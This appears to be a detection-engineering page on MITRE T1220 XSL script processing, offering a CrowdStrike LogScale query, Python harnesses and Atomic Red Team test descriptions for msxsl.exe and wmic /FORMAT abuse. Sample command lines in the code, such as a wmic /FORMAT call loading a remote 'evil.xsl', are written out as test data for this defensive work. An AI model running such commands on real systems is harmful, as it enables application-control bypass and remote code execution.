Detect XSL Script Processing in CrowdStrike LogScale
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files support embedded scripting in JavaScript, VBScript, and other languages. Two primary abuse vectors exist: (1) msxsl.exe, Microsoft's command-line XSLT transformation utility, which can execute arbitrary JavaScript or VBScript embedded in local or remote XSL files; and (2) wmic.exe with the /FORMAT switch ('Squiblytwo'), which invokes JScript or VBScript within XSL via WMI. Both techniques leverage trusted Windows tooling to proxy malicious code execution while evading application control solutions such as AppLocker. Since msxsl.exe is not installed by default, adversaries typically drop it alongside their payloads. Real-world usage includes Astaroth, Cobalt Group, and Higaisa.
MITRE ATT&CK
- Tactic: Defense Evasion
- Technique: T1220 XSL Script Processing
- Canonical reference: https://attack.mitre.org/techniques/T1220/
LogScale Detection Query
// T1220 XSL Script Processing - msxsl.exe and wmic.exe /FORMAT (Squiblytwo)
#event_simpleName = "ProcessRollup2"
| ImageFileName = /(?i)\\msxsl\.exe$/ OR (ImageFileName = /(?i)\\wmic\.exe$/ AND CommandLine = /(?i)\/format/)
// Indicator flags (1 = present, 0 = absent)
| is_msxsl := if(ImageFileName = /(?i)\\msxsl\.exe$/, then=1, else=0)
| is_wmic_format := if(ImageFileName = /(?i)\\wmic\.exe$/ AND CommandLine = /(?i)\/format/, then=1, else=0)
| remote_load := if(CommandLine = /(?i)(https?:\/\/|ftp:\/\/|\\\\)/, then=1, else=0)            // URL or UNC path argument
| arbitrary_ext := if(CommandLine = /(?i)\.(jpeg|jpg|png|gif|txt|dat|bin|log)(\s|$)/, then=1, else=0)  // XSL masked as another file type
| same_file_arg := if(CommandLine = /(?i)(\S+\.[a-z]+)\s+\1(\s|$)/, then=1, else=0)          // same file passed as both XML and XSL
| xsl_format_target := if(CommandLine = /(?i)\/format[:\s]+\S*\.xslt?/, then=1, else=0)       // /FORMAT pointing at an .xsl or .xslt file
| remote_xsl_format := if(is_wmic_format = 1 AND remote_load = 1, then=1, else=0)
// First matching row wins
| case {
    is_msxsl = 1 AND remote_load = 1 | technique_variant := "msxsl-remote-xsl";
    is_msxsl = 1 AND same_file_arg = 1 | technique_variant := "msxsl-same-file";
    is_msxsl = 1 AND arbitrary_ext = 1 | technique_variant := "msxsl-arbitrary-ext";
    is_msxsl = 1 | technique_variant := "msxsl-local-xsl";
    remote_xsl_format = 1 | technique_variant := "squiblytwo-remote";
    is_wmic_format = 1 | technique_variant := "squiblytwo-local";
    * | technique_variant := "unknown"
  }
| risk_score := is_msxsl + remote_load + arbitrary_ext + same_file_arg + remote_xsl_format
| table([
    timestamp, ComputerName, UserName, ImageFileName, CommandLine,
    ParentImageFileName, ParentCommandLine,
    technique_variant, remote_load, arbitrary_ext, same_file_arg, risk_score
  ])
| sort(timestamp, order=desc)

CrowdStrike LogScale (Falcon) CQL query detecting T1220 XSL Script Processing. It queries ProcessRollup2 events for msxsl.exe invocations and wmic.exe /FORMAT abuse, classifies the technique variant (remote XSL, same-file-twice, arbitrary extension, Squiblytwo local/remote) and computes a composite risk score.
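To check the query's classification logic before deploying it, here is an added Python emulation of its indicator regexes, case ordering and risk score, run over constructed ProcessRollup2-style records. This is example code written for this page, not CrowdStrike's or the page author's; the field names follow the Falcon schema the query uses, and every event in it is constructed test data.

```python
"""Added example: offline emulation of the LogScale T1220 query above.

Re-implements the query's indicator regexes, case{} ordering and risk score so
they can be exercised against constructed ProcessRollup2-style records. Field
names follow the Falcon schema the query uses; every event below is
constructed test data, not real telemetry.
"""
import re

# Indicator patterns, carried over from the query's regex literals.
MSXSL_RE = re.compile(r"\\msxsl\.exe$", re.I)
WMIC_RE = re.compile(r"\\wmic\.exe$", re.I)
FORMAT_RE = re.compile(r"/format", re.I)
REMOTE_RE = re.compile(r"(https?://|ftp://|\\\\)", re.I)       # URL or UNC path argument
ARBITRARY_EXT_RE = re.compile(r"\.(jpeg|jpg|png|gif|txt|dat|bin|log)(\s|$)", re.I)
SAME_FILE_RE = re.compile(r"(\S+\.[a-z]+)\s+\1(\s|$)", re.I)   # one file passed twice

# Same order as the query's case{}: the first matching row wins.
VARIANT_RULES = [
    (lambda f: f["is_msxsl"] and f["remote_load"], "msxsl-remote-xsl"),
    (lambda f: f["is_msxsl"] and f["same_file_arg"], "msxsl-same-file"),
    (lambda f: f["is_msxsl"] and f["arbitrary_ext"], "msxsl-arbitrary-ext"),
    (lambda f: f["is_msxsl"], "msxsl-local-xsl"),
    (lambda f: f["remote_xsl_format"], "squiblytwo-remote"),
    (lambda f: f["is_wmic_format"], "squiblytwo-local"),
]


def classify(event):
    """Derive the query's fields for one event; None if the first-stage
    filter (msxsl.exe, or wmic.exe with /FORMAT) would drop it."""
    image = event.get("ImageFileName", "")
    cmd = event.get("CommandLine", "")
    f = {
        "is_msxsl": int(bool(MSXSL_RE.search(image))),
        "is_wmic_format": int(bool(WMIC_RE.search(image) and FORMAT_RE.search(cmd))),
    }
    if not (f["is_msxsl"] or f["is_wmic_format"]):
        return None
    f["remote_load"] = int(bool(REMOTE_RE.search(cmd)))
    f["arbitrary_ext"] = int(bool(ARBITRARY_EXT_RE.search(cmd)))
    f["same_file_arg"] = int(bool(SAME_FILE_RE.search(cmd)))
    f["remote_xsl_format"] = int(f["is_wmic_format"] and f["remote_load"])
    f["technique_variant"] = next(
        (name for test, name in VARIANT_RULES if test(f)), "unknown")
    f["risk_score"] = (f["is_msxsl"] + f["remote_load"] + f["arbitrary_ext"]
                       + f["same_file_arg"] + f["remote_xsl_format"])
    return {**event, **f}


def run_detection(events):
    """Classify every event and order the hits like the query (timestamp desc)."""
    hits = [h for h in map(classify, events) if h is not None]
    return sorted(hits, key=lambda h: h["timestamp"], reverse=True)


def _ev(ts, image, cmd):
    # Constructed ProcessRollup2-style record with only the fields the query reads.
    return {"timestamp": ts, "ComputerName": "WS-LAB01", "UserName": "tester",
            "ImageFileName": image, "CommandLine": cmd,
            "ParentImageFileName": r"\Device\HarddiskVolume3\Windows\System32\cmd.exe"}


MSXSL = r"\Device\HarddiskVolume3\Tools\msxsl.exe"
WMIC = r"\Device\HarddiskVolume3\Windows\System32\wbem\WMIC.exe"

# Constructed events: the five Atomic tests from this page, a UNC-path
# invocation of the kind named under False Positives, and two benign rows.
SAMPLE_EVENTS = [
    _ev(1, MSXSL, "msxsl.exe test.xml test.xsl"),
    _ev(2, MSXSL, "msxsl.exe selfref.xsl selfref.xsl"),
    _ev(3, WMIC, 'wmic os get /FORMAT:"http://127.0.0.1:19823/evil.xsl"'),
    _ev(4, WMIC, r"wmic process list /FORMAT:C:\Users\tester\AppData\Local\Temp\wmic_test.xsl"),
    _ev(5, MSXSL, "msxsl.exe data.jpeg style.jpeg"),
    _ev(6, MSXSL, r"msxsl.exe \\fileshare\xml\in.xml \\fileshare\xml\t.xsl"),
    _ev(7, r"\Device\HarddiskVolume3\Windows\System32\notepad.exe", "notepad.exe"),
    _ev(8, WMIC, "wmic os get caption"),
]

if __name__ == "__main__":
    for h in run_detection(SAMPLE_EVENTS):
        print(f'{h["timestamp"]:>2} {h["technique_variant"]:<20} risk={h["risk_score"]}  {h["CommandLine"]}')
```

Running it prints one row per event that survives the first-stage filter, in the query's sort order. Two things the output makes visible: the UNC-path invocation is classified as msxsl-remote-xsl with the same score as a genuine remote load (which is exactly the false-positive case listed below), and a local Squiblytwo invocation scores 0 because is_wmic_format is not a term in the risk_score sum, so technique_variant, not the score, is what identifies that case.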
Data Sources
Required Tables
- ProcessRollup2 (#event_simpleName) process-execution events from the Falcon sensor; the query reads ImageFileName, CommandLine, ParentImageFileName, ParentCommandLine, ComputerName, UserName and timestamp.
False Positives & Tuning
- Legitimate use of msxsl.exe by internal XML/XSLT processing tools accessing shared network drives via UNC paths, which trigger the remote-load indicator
- wmic.exe /FORMAT invocations by monitoring or inventory scripts that format WMI output using approved local XSL stylesheets
- Automated software packaging or installation processes that invoke msxsl.exe to process XML configuration transforms during deployment
Testing Methodology
Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: msxsl.exe Local XSL Script Execution
Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing test.xml and test.xsl. Sysmon Event ID 7: Image Load for jscript.dll loaded by msxsl.exe, confirming JScript engine activation. Sysmon Event ID 1: Child process whoami.exe spawned by msxsl.exe (or WScript.Shell). Sysmon Event ID 11: File creation events for test.xml and test.xsl.
- Test 2: msxsl.exe Same-File Argument Evasion
Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine showing the same filename appearing twice (e.g., 'selfref.xsl selfref.xsl'). Sysmon Event ID 7: Image Load for jscript.dll by msxsl.exe. Sysmon Event ID 11: File creation for selfref.xsl.
- Test 3: Squiblytwo (wmic /FORMAT Remote XSL Execution)
Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and 'http://127.0.0.1:19823/evil.xsl'. Sysmon Event ID 3: Network Connection attempt from wmic.exe to 127.0.0.1:19823 (connection refused, but event is logged). Sysmon Event ID 22: DNS query if a hostname is used instead of IP.
- Test 4: Squiblytwo (wmic /FORMAT Local XSL File)
Expected signal: Sysmon Event ID 1: Process Create with Image=wmic.exe, CommandLine containing '/FORMAT' and the %TEMP% path to wmic_test.xsl. Sysmon Event ID 7: jscript.dll loaded by wmic.exe. Sysmon Event ID 11: File creation for wmic_test.xsl.
- Test 5: msxsl.exe Arbitrary Extension Masking
Expected signal: Sysmon Event ID 1: Process Create with Image=msxsl.exe, CommandLine containing '.jpeg' file extensions instead of .xsl. Sysmon Event ID 7: jscript.dll loaded by msxsl.exe. Sysmon Event ID 11: File creation events for data.jpeg and style.jpeg.
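When running these tests, the useful question is which of the expected signals actually showed up in the collected telemetry, since the ProcessRollup2 hit alone does not confirm that a script engine ran. The following added Python harness encodes the expected signals above as data and reports, per test, which ones a Sysmon capture is missing. It is example code written for this page, not part of the original or of Atomic Red Team; the field names (EventID, Image, CommandLine, ImageLoaded, ParentImage, TargetFilename, DestinationIp, DestinationPort) are Sysmon's, and the sample events are constructed.

```python
"""Added example: checks constructed Sysmon telemetry against the expected
signals listed for the five Atomic Red Team tests above. Not part of the
original page or of Atomic Red Team; field names are Sysmon's and the
events are constructed test data.
"""

# One entry per expected signal: (Sysmon EventID, {field: substring that must appear}).
EXPECTED_SIGNALS = {
    "Test 1 msxsl local XSL": [
        (1, {"Image": "msxsl.exe", "CommandLine": "test.xml test.xsl"}),
        (7, {"Image": "msxsl.exe", "ImageLoaded": "jscript.dll"}),
        (1, {"ParentImage": "msxsl.exe", "Image": "whoami.exe"}),   # child spawned by the script
        (11, {"TargetFilename": "test.xsl"}),
    ],
    "Test 2 msxsl same file": [
        (1, {"Image": "msxsl.exe", "CommandLine": "selfref.xsl selfref.xsl"}),
        (7, {"Image": "msxsl.exe", "ImageLoaded": "jscript.dll"}),
        (11, {"TargetFilename": "selfref.xsl"}),
    ],
    "Test 3 Squiblytwo remote": [
        (1, {"Image": "wmic.exe", "CommandLine": "/format"}),
        (1, {"Image": "wmic.exe", "CommandLine": "127.0.0.1:19823/evil.xsl"}),
        (3, {"Image": "wmic.exe", "DestinationIp": "127.0.0.1", "DestinationPort": "19823"}),
    ],
    "Test 4 Squiblytwo local": [
        (1, {"Image": "wmic.exe", "CommandLine": "wmic_test.xsl"}),
        (7, {"Image": "wmic.exe", "ImageLoaded": "jscript.dll"}),
        (11, {"TargetFilename": "wmic_test.xsl"}),
    ],
    "Test 5 msxsl arbitrary extension": [
        (1, {"Image": "msxsl.exe", "CommandLine": ".jpeg"}),
        (7, {"Image": "msxsl.exe", "ImageLoaded": "jscript.dll"}),
        (11, {"TargetFilename": "style.jpeg"}),
    ],
}


def matches(event, event_id, fields):
    """True if the event has this EventID and every named field contains its substring
    (case-insensitive, so paths and /FORMAT casing do not matter)."""
    if event.get("EventID") != event_id:
        return False
    return all(want.lower() in str(event.get(key, "")).lower()
               for key, want in fields.items())


def missing_signals(test_name, events):
    """Expected signals for one test that no event in the capture satisfies."""
    return [(eid, fields) for eid, fields in EXPECTED_SIGNALS[test_name]
            if not any(matches(e, eid, fields) for e in events)]


def validate(events):
    """Map each test to its list of missing signals ([] means fully observed)."""
    return {name: missing_signals(name, events) for name in EXPECTED_SIGNALS}


# Constructed capture: Test 1 fully observed; Test 3 present but without the
# Event ID 3 network event, as happens when the Sysmon config does not log connections.
SAMPLE_SYSMON = [
    {"EventID": 1, "Image": r"C:\Tools\msxsl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "msxsl.exe test.xml test.xsl"},
    {"EventID": 11, "Image": r"C:\Windows\System32\cmd.exe", "TargetFilename": r"C:\Tools\test.xml"},
    {"EventID": 11, "Image": r"C:\Windows\System32\cmd.exe", "TargetFilename": r"C:\Tools\test.xsl"},
    {"EventID": 7, "Image": r"C:\Tools\msxsl.exe", "ImageLoaded": r"C:\Windows\System32\jscript.dll"},
    {"EventID": 1, "Image": r"C:\Windows\System32\whoami.exe", "ParentImage": r"C:\Tools\msxsl.exe",
     "CommandLine": "whoami"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic os get /FORMAT:"http://127.0.0.1:19823/evil.xsl"'},
]

if __name__ == "__main__":
    for name, missing in validate(SAMPLE_SYSMON).items():
        status = "observed" if not missing else f"missing {len(missing)} signal(s)"
        print(f"{name:<36} {status}")
```

A caveat the sample capture shows: the jscript.dll Image Load signal is shared by Tests 1, 2 and 5, so one capture covering several runs will satisfy it for all of them. Collect and validate each test's telemetry separately, or key the check on the process that loaded the engine, before treating a signal as confirmed.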
References
- https://attack.mitre.org/techniques/T1220/
- https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- https://lolbas-project.github.io/lolbas/Binaries/Msxsl/
- https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md
- https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_lolbin_msxsl.yml
- https://www.cybereason.com/blog/astaroth-malware-abuses-legitimate-os-and-antivirus-processes